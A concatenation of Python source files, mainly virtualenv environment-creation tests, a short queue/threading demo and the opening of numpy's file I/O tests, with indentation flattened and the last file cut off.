result = [i for i in paths if not any(str(i).startswith(str(t)) for t in to_remove)]
return result
@pytest.fixture(scope="session")
def system(session_app_data):
return get_env_debug_info(Path(CURRENT.system_executable), DEBUG_SCRIPT, session_app_data)
CURRENT_CREATORS = list(i for i in CURRENT.creators().key_to_class.keys() if i != "builtin")
CREATE_METHODS = []
for k, v in CURRENT.creators().key_to_meta.items():
if k in CURRENT_CREATORS:
if v.can_copy:
CREATE_METHODS.append((k, "copies"))
if v.can_symlink:
CREATE_METHODS.append((k, "symlinks"))
_VENV_BUG_ON = (
IS_PYPY
and CURRENT.version_info[0:3] == (3, 6, 9)
and CURRENT.pypy_version_info[0:2] == [7, 3]
and CURRENT.platform == "linux"
)
@pytest.mark.parametrize(
"creator, isolated",
[
pytest.param(
*i,
marks=pytest.mark.xfail(
reason="https://bitbucket.org/pypy/pypy/issues/3159/pypy36-730-venv-fails-with-copies-on-linux",
strict=True,
)
)
if _VENV_BUG_ON and i[0][0] == "venv" and i[0][1] == "copies"
else i
for i in product(CREATE_METHODS, ["isolated", "global"])
],
ids=lambda i: "-".join(i) if isinstance(i, tuple) else i,
)
def test_create_no_seed(python, creator, isolated, system, coverage_env, special_name_dir):
dest = special_name_dir
creator_key, method = creator
cmd = [
"-v",
"-v",
"-p",
ensure_text(python),
ensure_text(str(dest)),
"--without-pip",
"--activators",
"",
"--creator",
creator_key,
"--{}".format(method),
]
if isolated == "global":
cmd.append("--system-site-packages")
result = cli_run(cmd)
creator = result.creator
coverage_env()
if IS_PYPY:
# pypy cleans up file descriptors periodically so our (many) subprocess calls impact file descriptor limits
# force a close of these on system where the limit is low-ish (e.g. MacOS 256)
gc.collect()
purelib = creator.purelib
patch_files = {purelib / "{}.{}".format("_virtualenv", i) for i in ("py", "pyc", "pth")}
patch_files.add(purelib / "__pycache__")
content = set(creator.purelib.iterdir()) - patch_files
assert not content, "\n".join(ensure_text(str(i)) for i in content)
assert creator.env_name == ensure_text(dest.name)
debug = creator.debug
assert "exception" not in debug, "{}\n{}\n{}".format(debug.get("exception"), debug.get("out"), debug.get("err"))
sys_path = cleanup_sys_path(debug["sys"]["path"])
system_sys_path = cleanup_sys_path(system["sys"]["path"])
our_paths = set(sys_path) - set(system_sys_path)
our_paths_repr = "\n".join(ensure_text(repr(i)) for i in our_paths)
# ensure we have at least one extra path added
assert len(our_paths) >= 1, our_paths_repr
# ensure all additional paths are related to the virtual environment
for path in our_paths:
msg = "\n{}\ndoes not start with {}\nhas:\n{}".format(
ensure_text(str(path)), ensure_text(str(dest)), "\n".join(ensure_text(str(p)) for p in system_sys_path),
)
assert str(path).startswith(str(dest)), msg
# ensure there's at least a site-packages folder as part of the virtual environment added
assert any(p for p in our_paths if p.parts[-1] == "site-packages"), our_paths_repr
# ensure the global site package is added or not, depending on flag
global_sys_path = system_sys_path[-1]
if isolated == "isolated":
msg = "global sys path {} is in virtual environment sys path:\n{}".format(
ensure_text(str(global_sys_path)), "\n".join(ensure_text(str(j)) for j in sys_path)
)
assert global_sys_path not in sys_path, msg
else:
common = []
for left, right in zip(reversed(system_sys_path), reversed(sys_path)):
if left == right:
common.append(left)
else:
break
def list_to_str(iterable):
return [ensure_text(str(i)) for i in iterable]
assert common, "\n".join(difflib.unified_diff(list_to_str(sys_path), list_to_str(system_sys_path)))
# test that the python executables in the bin directory are either:
# - files
# - absolute symlinks outside of the venv
# - relative symlinks inside of the venv
if sys.platform == "win32":
exes = ("python.exe",)
else:
exes = ("python", "python{}".format(*sys.version_info), "python{}.{}".format(*sys.version_info))
if creator_key == "venv":
# for venv some repackaging does not includes the pythonx.y
exes = exes[:-1]
for exe in exes:
exe_path = creator.bin_dir / exe
assert exe_path.exists(), "\n".join(str(i) for i in creator.bin_dir.iterdir())
if not exe_path.is_symlink(): # option 1: a real file
continue # it was a file
link = os.readlink(str(exe_path))
if not os.path.isabs(link): # option 2: a relative symlink
continue
# option 3: an absolute symlink, should point outside the venv
assert not link.startswith(str(creator.dest))
if IS_WIN and CURRENT.implementation == "CPython":
python_w = creator.exe.parent / "pythonw.exe"
assert python_w.exists()
assert python_w.read_bytes() != creator.exe.read_bytes()
if CPython3Posix.pyvenv_launch_patch_active(PythonInfo.from_exe(python)) and creator_key != "venv":
result = subprocess.check_output(
[str(creator.exe), "-c", 'import os; print(os.environ.get("__PYVENV_LAUNCHER__"))'],
universal_newlines=True,
).strip()
assert result == "None"
if isinstance(creator, CPython2PosixBase):
make_file = debug["makefile_filename"]
assert os.path.exists(make_file)
@pytest.mark.skipif(not CURRENT.has_venv, reason="requires interpreter with venv")
def test_venv_fails_not_inline(tmp_path, capsys, mocker):
if hasattr(os, "geteuid"):
if os.geteuid() == 0:
pytest.skip("no way to check permission restriction when running under root")
def _session_via_cli(args, options=None):
session = session_via_cli(args, options)
assert session.creator.can_be_inline is False
return session
mocker.patch("virtualenv.run.session_via_cli", side_effect=_session_via_cli)
before = tmp_path.stat().st_mode
cfg_path = tmp_path / "pyvenv.cfg"
cfg_path.write_text(ensure_text(""))
cfg = str(cfg_path)
try:
os.chmod(cfg, stat.S_IREAD | stat.S_IRGRP | stat.S_IROTH)
cmd = ["-p", str(CURRENT.executable), str(tmp_path), "--without-pip", "--creator", "venv"]
with pytest.raises(SystemExit) as context:
run(cmd)
assert context.value.code != 0
finally:
os.chmod(cfg, before)
out, err = capsys.readouterr()
assert "subprocess call failed for" in out, out
assert "Error:" in err, err
@pytest.mark.skipif(not sys.version_info[0] == 2, reason="python 2 only tests")
def test_debug_bad_virtualenv(tmp_path):
cmd = [str(tmp_path), "--without-pip"]
result = cli_run(cmd)
# if the site.py is removed/altered the debug should fail as no one is around to fix the paths
site_py = result.creator.stdlib / "site.py"
site_py.unlink()
# insert something that writes something on the stdout
site_py.write_text('import sys; sys.stdout.write(repr("std-out")); sys.stderr.write("std-err"); raise ValueError')
debug_info = result.creator.debug
assert debug_info["returncode"]
assert debug_info["err"].startswith("std-err")
assert "std-out" in debug_info["out"]
assert debug_info["exception"]
@pytest.mark.parametrize("creator", CURRENT_CREATORS)
@pytest.mark.parametrize("clear", [True, False], ids=["clear", "no_clear"])
def test_create_clear_resets(tmp_path, creator, clear, caplog):
caplog.set_level(logging.DEBUG)
if creator == "venv" and clear is False:
pytest.skip("venv without clear might fail")
marker = tmp_path / "magic"
cmd = [str(tmp_path), "--seeder", "app-data", "--without-pip", "--creator", creator, "-vvv"]
cli_run(cmd)
marker.write_text("") # if we a marker file this should be gone on a clear run, remain otherwise
assert marker.exists()
cli_run(cmd + (["--clear"] if clear else []))
assert marker.exists() is not clear
@pytest.mark.parametrize("creator", CURRENT_CREATORS)
@pytest.mark.parametrize("prompt", [None, "magic"])
def test_prompt_set(tmp_path, creator, prompt):
cmd = [str(tmp_path), "--seeder", "app-data", "--without-pip", "--creator", creator]
if prompt is not None:
cmd.extend(["--prompt", "magic"])
result = cli_run(cmd)
actual_prompt = tmp_path.name if prompt is None else prompt
cfg = PyEnvCfg.from_file(result.creator.pyenv_cfg.path)
if prompt is None:
assert "prompt" not in cfg
else:
if creator != "venv":
assert "prompt" in cfg, list(cfg.content.keys())
assert cfg["prompt"] == actual_prompt
@pytest.mark.slow
def test_cross_major(cross_python, coverage_env, tmp_path, session_app_data, current_fastest):
cmd = [
"-p",
ensure_text(cross_python.executable),
ensure_text(str(tmp_path)),
"--no-setuptools",
"--no-wheel",
"--activators",
"",
]
result = cli_run(cmd)
pip_scripts = {i.name.replace(".exe", "") for i in result.creator.script_dir.iterdir() if i.name.startswith("pip")}
major, minor = cross_python.version_info[0:2]
assert pip_scripts == {
"pip",
"pip{}".format(major),
"pip-{}.{}".format(major, minor),
"pip{}.{}".format(major, minor),
}
coverage_env()
env = PythonInfo.from_exe(str(result.creator.exe), session_app_data)
assert env.version_info.major != CURRENT.version_info.major
def test_create_parallel(tmp_path, monkeypatch, temp_app_data):
def create(count):
subprocess.check_call(
[sys.executable, "-m", "virtualenv", "-vvv", str(tmp_path / "venv{}".format(count)), "--without-pip"]
)
threads = [Thread(target=create, args=(i,)) for i in range(1, 4)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def test_creator_input_passed_is_abs(tmp_path, monkeypatch):
monkeypatch.chdir(tmp_path)
result = Creator.validate_dest("venv")
assert str(result) == str(tmp_path / "venv")
@pytest.mark.skipif(os.altsep is None, reason="OS does not have an altsep")
def test_creator_replaces_altsep_in_dest(tmp_path):
dest = str(tmp_path / "venv{}foobar")
result = Creator.validate_dest(dest.format(os.altsep))
assert str(result) == dest.format(os.sep)
def test_create_long_path(current_fastest, tmp_path):
if sys.platform == "darwin":
max_shebang_length = 512
else:
max_shebang_length = 127
# filenames can be at most 255 long on macOS, so split to to levels
count = max_shebang_length - len(str(tmp_path))
folder = tmp_path / ("a" * (count // 2)) / ("b" * (count // 2)) / "c"
folder.mkdir(parents=True)
cmd = [str(folder)]
result = cli_run(cmd)
subprocess.check_call([str(result.creator.script("pip")), "--version"])
@pytest.mark.parametrize("creator", sorted(set(PythonInfo.current_system().creators().key_to_class) - {"builtin"}))
def test_create_distutils_cfg(creator, tmp_path, monkeypatch):
result = cli_run([ensure_text(str(tmp_path / "venv")), "--activators", "", "--creator", creator])
app = Path(__file__).parent / "console_app"
dest = tmp_path / "console_app"
shutil.copytree(str(app), str(dest))
setup_cfg = dest / "setup.cfg"
conf = dedent(
"""
[install]
prefix={0}{1}prefix
install_purelib={0}{1}purelib
install_platlib={0}{1}platlib
install_headers={0}{1}headers
install_scripts={0}{1}scripts
install_data={0}{1}data
""".format(
tmp_path, os.sep
)
)
setup_cfg.write_text(setup_cfg.read_text() + conf)
monkeypatch.chdir(dest) # distutils will read the setup.cfg from the cwd, so change to that
install_demo_cmd = [
str(result.creator.script("pip")),
"--disable-pip-version-check",
"install",
str(dest),
"--no-use-pep517",
"-vv",
]
subprocess.check_call(install_demo_cmd)
magic = result.creator.script("magic") # console scripts are created in the right location
assert magic.exists()
package_folder = result.creator.purelib / "demo" # prefix is set to the virtualenv prefix for install
assert package_folder.exists(), list_files(str(tmp_path))
def list_files(path):
result = ""
for root, _, files in os.walk(path):
level = root.replace(path, "").count(os.sep)
indent = " " * 4 * level
result += "{}{}/\n".format(indent, os.path.basename(root))
sub = " " * 4 * (level + 1)
for f in files:
result += "{}{}\n".format(sub, f)
return result
@pytest.mark.parametrize("python_path_on", [True, False], ids=["on", "off"])
@pytest.mark.skipif(PY3, reason="we rewrite sys.path only on PY2")
def test_python_path(monkeypatch, tmp_path, python_path_on):
result = cli_run([ensure_text(str(tmp_path)), "--without-pip", "--activators", ""])
monkeypatch.chdir(tmp_path)
case_sensitive = fs_is_case_sensitive()
def _get_sys_path(flag=None):
cmd = [str(result.creator.exe)]
if flag:
cmd.append(flag)
cmd.extend(["-c", "import json; import sys; print(json.dumps(sys.path))"])
return [i if case_sensitive else i.lower() for i in json.loads(subprocess.check_output(cmd))]
monkeypatch.delenv(str("PYTHONPATH"), raising=False)
base = _get_sys_path()
# note the value result.creator.interpreter.system_stdlib cannot be set, as that would disable our custom site.py
python_paths = [
str(Path(result.creator.interpreter.prefix)),
str(Path(result.creator.interpreter.system_stdlib) / "b"),
str(result.creator.purelib / "a"),
str(result.creator.purelib),
str(result.creator.bin_dir),
str(tmp_path / "base"),
str(tmp_path / "base_sep") + os.sep,
"name",
"name{}".format(os.sep),
str(tmp_path.parent / (ensure_text(tmp_path.name) + "_suffix")),
".",
"..",
"",
]
python_path_env = os.pathsep.join(ensure_str(i) for i in python_paths)
monkeypatch.setenv(str("PYTHONPATH"), python_path_env)
extra_all = _get_sys_path(None if python_path_on else "-E")
if python_path_on:
assert extra_all[0] == "" # the cwd is always injected at start as ''
extra_all = extra_all[1:]
assert base[0] == ""
base = base[1:]
assert not (set(base) - set(extra_all)) # all base paths are present
abs_python_paths = list(OrderedDict((os.path.abspath(ensure_text(i)), None) for i in python_paths).keys())
abs_python_paths = [i if case_sensitive else i.lower() for i in abs_python_paths]
extra_as_python_path = extra_all[: len(abs_python_paths)]
assert abs_python_paths == extra_as_python_path # python paths are there at the start
non_python_path = extra_all[len(abs_python_paths) :]
assert non_python_path == [i for i in base if i not in extra_as_python_path]
else:
assert base == extra_all
@pytest.mark.skipif(
not (CURRENT.implementation == "CPython" and PY2),
reason="stdlib components without py files only possible on CPython2",
)
@pytest.mark.parametrize(
"py, pyc",
list(
product(
[True, False] if Python2.from_stdlib(Python2.mappings(CURRENT), "os.py")[2] else [False],
[True, False] if Python2.from_stdlib(Python2.mappings(CURRENT), "os.pyc")[2] else [False],
)
),
)
def test_py_pyc_missing(tmp_path, mocker, session_app_data, py, pyc):
"""Ensure that creation can succeed if os.pyc exists (even if os.py has been deleted)"""
previous = Python2.from_stdlib
def from_stdlib(mappings, name):
path, to, exists = previous(mappings, name)
if name.endswith("py"):
exists = py
elif name.endswith("pyc"):
exists = pyc
return path, to, exists
mocker.patch.object(Python2, "from_stdlib", side_effect=from_stdlib)
result = cli_run([ensure_text(str(tmp_path)), "--without-pip", "--activators", "", "-vv"])
py_at = Python2.from_stdlib(Python2.mappings(CURRENT), "os.py")[1](result.creator, Path("os.py"))
py = pyc is False or py # if pyc is False we fallback to serve the py, which will exist (as we only mock the check)
assert py_at.exists() is py
pyc_at = Python2.from_stdlib(Python2.mappings(CURRENT), "osc.py")[1](result.creator, Path("os.pyc"))
assert pyc_at.exists() is pyc
def test_zip_importer_can_import_setuptools(tmp_path):
"""We're patching the loaders so might fail on r/o loaders, such as zipimporter on CPython<3.8"""
result = cli_run([str(tmp_path / "venv"), "--activators", "", "--no-pip", "--no-wheel", "--copies"])
zip_path = tmp_path / "site-packages.zip"
with zipfile.ZipFile(str(zip_path), "w", zipfile.ZIP_DEFLATED) as zip_handler:
lib = str(result.creator.purelib)
for root, _, files in os.walk(lib):
base = root[len(lib) :].lstrip(os.pathsep)
for file in files:
if not file.startswith("_virtualenv"):
zip_handler.write(filename=os.path.join(root, file), arcname=os.path.join(base, file))
for folder in result.creator.purelib.iterdir():
if not folder.name.startswith("_virtualenv"):
if folder.is_dir():
shutil.rmtree(str(folder), ignore_errors=True)
else:
folder.unlink()
env = os.environ.copy()
env[str("PYTHONPATH")] = str(zip_path)
subprocess.check_call([str(result.creator.exe), "-c", "from setuptools.dist import Distribution"], env=env)
|
queue_operations.py | import queue
import threading
def my_subscriber(queue_p):
while True:
item = queue_p.get()
if item is None:
break
print("{} removed {} from the queue".format(threading.current_thread(), item))
print("Queue Size is now: {}".format(queue_p.qsize()))
queue_p.task_done()
myQueue = queue.Queue()
for i in range(10):
myQueue.put(i)
print("Queue Populated")
threads = []
for i in range(4):
thread = threading.Thread(target=my_subscriber, args=(myQueue,))
thread.start()
threads.append(thread)
myQueue.join()
|
test_io.py | from __future__ import division, absolute_import, print_function
import sys
import gzip
import os
import threading
import time
import warnings
import io
import re
import pytest
from tempfile import NamedTemporaryFile
from io import BytesIO, StringIO
from datetime import datetime
import locale
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import ConverterError, ConversionWarning
from numpy.compat import asbytes, bytes, Path
from numpy.ma.testutils import assert_equal
from numpy.testing import (
assert_warns, assert_, assert_raises_regex, assert_raises,
assert_allclose, assert_array_equal, temppath, tempdir, IS_PYPY,
HAS_REFCOUNT, suppress_warnings, assert_no_gc_cycles,
)
class TextIO(BytesIO):
"""Helper IO class.
Writes encode strings to bytes if needed, reads return bytes.
This makes it easier to emulate files opened in binary mode
without needing to explicitly convert strings to bytes in
setting up the test data.
"""
def __init__(self, s=""):
BytesIO.__init__(self, asbytes(s))
def write(self, s):
BytesIO.write(self, asbytes(s))
def writelines(self, lines):
BytesIO.writelines(self, [asbytes(s) for s in lines])
MAJVER, MINVER = sys.version_info[:2]
IS_64BIT = sys.maxsize > 2**32
try:
import bz2
HAS_BZ2 = True
except ImportError:
HAS_BZ2 = False
try:
import lzma
HAS_LZMA = True
except ImportError:
HAS_LZMA = False
def strptime(s, fmt=None):
"""
This function is available in the datetime module only from Python >=
2.5.
"""
if type(s) == bytes:
s = s.decode("latin1")
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {"allow_pickle": True})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
target_file = NamedTemporaryFile(delete=False)
load_file = target_file.name
else:
target_file = BytesIO()
load_file = target_file
try:
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
finally:
if not isinstance(target_file, BytesIO):
target_file.close()
# holds an open file descriptor so it can't be deleted on win
if 'arr_reloaded' in locals():
if not isinstance(arr_reloaded, np.lib.npyio.NpzFile):
os.remove(target_file.name)
def check_roundtrips(self, a):
self.roundtrip(a)
self.roundtrip(a, file_on_disk=True)
self.roundtrip(np.asfortranarray(a))
self.roundtrip(np.asfortranarray(a), file_on_disk=True)
if a.shape[0] > 1:
# neither C nor Fortran contiguous for 2D arrays or more
self.roundtrip(np.asfortranarray(a)[1:])
self.roundtrip(np.asfortranarray(a)[1:], file_on_disk=True)
def test_array(self):
a = np.array([], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], int)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.check_roundtrips(a)
def test_array_object(self):
a = np.array([], object)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], object)
self.check_roundtrips(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@pytest.mark.skipif(sys.platform == 'win32', reason="Fails on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
a = np.asfortranarray([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.check_roundtrips(a)
@pytest.mark.slow
def test_format_2_0(self):
dt = [(("%d" % i) * 100, float) for i in range(500)]
a = np.ones(1000, dtype=dt)
with warnings.catch_warnings(record=True):
warnings.filterwarnings('always', '', UserWarning)
self.check_roundtrips(a)
class TestSaveLoad(RoundtripTest):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
assert_equal(self.arr[0].dtype, self.arr_reloaded.dtype)
assert_equal(self.arr[0].flags.fnc, self.arr_reloaded.flags.fnc)
class TestSavezLoad(RoundtripTest):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
try:
for n, arr in enumerate(self.arr):
reloaded = self.arr_reloaded['arr_%d' % n]
assert_equal(arr, reloaded)
assert_equal(arr.dtype, reloaded.dtype)
assert_equal(arr.flags.fnc, reloaded.flags.fnc)
finally:
# delete tempfile, must be done here on windows
if self.arr_reloaded.fid:
self.arr_reloaded.fid.close()
os.remove(self.arr_reloaded.fid.name)
@pytest.mark.skipif(not IS_64BIT, reason="Needs 64bit platform")
@pytest.mark.slow
def test_big_arrays(self):
L = (1 << 31) + 100000
a = np.empty(L, dtype=np.uint8)
with temppath(prefix="numpy_test_big_arrays_", suffix=".npz") as tmp:
np.savez(tmp, a=a)
del a
npfile = np.load(tmp)
a = npfile['a'] # Should succeed
npfile.close()
del a # Avoid pyflakes unused variable warning.
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_BagObj(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(sorted(dir(l.f)), ['file_a','file_b'])
assert_equal(a, l.f.file_a)
assert_equal(b, l.f.file_b)
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
with temppath(suffix='.npz') as tmp:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError as err:
error_list.append(err)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
def test_not_closing_opened_fid(self):
# Test that issue #2178 is fixed:
# verify could seek on 'loaded' file
with temppath(suffix='.npz') as tmp:
with open(tmp, 'wb') as fp:
np.savez(fp, data='LOVELY LOAD')
with open(tmp, 'rb', 10000) as fp:
fp.seek(0)
assert_(not fp.closed)
np.load(fp)['data']
# fp must not get closed by .load
assert_(not fp.closed)
fp.seek(0)
assert_(not fp.closed)
#FIXME: Is this still true?
@pytest.mark.skipif(IS_PYPY, reason="Missing context manager on PyPy")
def test_closing_fid(self):
# Test that issue #1517 (too many opened files) remains closed
# It might be a "weak" test since failed to get triggered on
# e.g. Debian sid of 2012 Jul 05 but was reported to
# trigger the failure on Ubuntu 10.04:
# http://projects.scipy.org/numpy/ticket/1517#comment:2
with temppath(suffix='.npz') as tmp:
np.savez(tmp, data='LOVELY LOAD')
# We need to check if the garbage collector can properly close
# numpy npz file returned by np.load when their reference count
# goes to zero. Python 3 running in debug mode raises a
# ResourceWarning when file closing is left to the garbage
# collector, so we catch the warnings. Because ResourceWarning
# is unknown in Python < 3.x, we take the easy way out and
# catch all warnings.
with suppress_warnings() as sup:
sup.filter(Warning) # TODO: specify exact message
for i in range(1, 1025):
try:
np.load(tmp)["data"]
except Exception as e:
msg = "Failed to load data from a file: %s" % e
raise AssertionError(msg)
def test_closing_zipfile_after_load(self):
# Check that zipfile owns file and can close it. This needs to
# pass a file name to load for the test. On windows failure will
# cause a second error will be raised when the attempt to remove
# the open file is made.
prefix = 'numpy_test_closing_zipfile_after_load_'
with temppath(suffix='.npz', prefix=prefix) as tmp:
np.savez(tmp, lab='place holder')
data = np.load(tmp)
fp = data.zip.fp
data.close()
assert_(fp.closed)
class TestSaveTxt(object):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = BytesIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])
a = np.array([[1, 2], [3, 4]], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_0D_3D(self):
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, np.array(1))
assert_raises(ValueError, np.savetxt, c, np.array([[[1], [2]]]))
def test_structured(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_structured_padded(self):
# gh-13297
a = np.array([(1, 2, 3),(4, 5, 6)], dtype=[
('foo', 'i4'), ('bar', 'i4'), ('baz', 'i4')
])
c = BytesIO()
np.savetxt(c, a[['foo', 'baz']], fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 3\n', b'4 6\n'])
@pytest.mark.skipif(Path is None, reason="No pathlib.Path")
def test_multifield_view(self):
a = np.ones(1, dtype=[('x', 'i4'), ('y', 'i4'), ('z', 'f4')])
v = a[['x', 'z']]
with temppath(suffix='.npy') as path:
path = Path(path)
np.save(path, v)
data = np.load(path)
assert_array_equal(data, v)
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Specify delimiter, should be overridden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Bad fmt, should raise a ValueError
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, a, fmt=99)
def test_header_footer(self):
# Test the functionality of the header and footer keyword argument.
c = BytesIO()
a = np.array([(1, 2), (3, 4)], dtype=int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
# Test the footer keyword argument
c = BytesIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
header=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
footer=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
with temppath() as name:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def test_complex_negative_exponent(self):
# Previous to 1.15, some formats generated x+-yj, gh 7895
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re - 1.0j * im
c = BytesIO()
np.savetxt(c, a, fmt='%.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' (3.142e+00-2.718e+00j) (3.142e+00-2.718e+00j)\n',
b' (3.142e+00-2.718e+00j) (3.142e+00-2.718e+00j)\n'])
def test_custom_writer(self):
class CustomWriter(list):
def write(self, text):
self.extend(text.split(b'\n'))
w = CustomWriter()
a = np.array([(1, 2), (3, 4)])
np.savetxt(w, a)
b = np.loadtxt(w)
assert_array_equal(a, b)
def test_unicode(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode)
with tempdir() as tmpdir:
# set encoding as on windows it may not be unicode even on py3
np.savetxt(os.path.join(tmpdir, 'test.csv'), a, fmt=['%s'],
encoding='UTF-8')
def test_unicode_roundtrip(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode)
# our gz wrapper support encoding
suffixes = ['', '.gz']
# stdlib 2 versions do not support encoding
if MAJVER > 2:
if HAS_BZ2:
suffixes.append('.bz2')
if HAS_LZMA:
suffixes.extend(['.xz', '.lzma'])
with tempdir() as tmpdir:
for suffix in suffixes:
np.savetxt(os.path.join(tmpdir, 'test.csv' + suffix), a,
fmt=['%s'], encoding='UTF-16-LE')
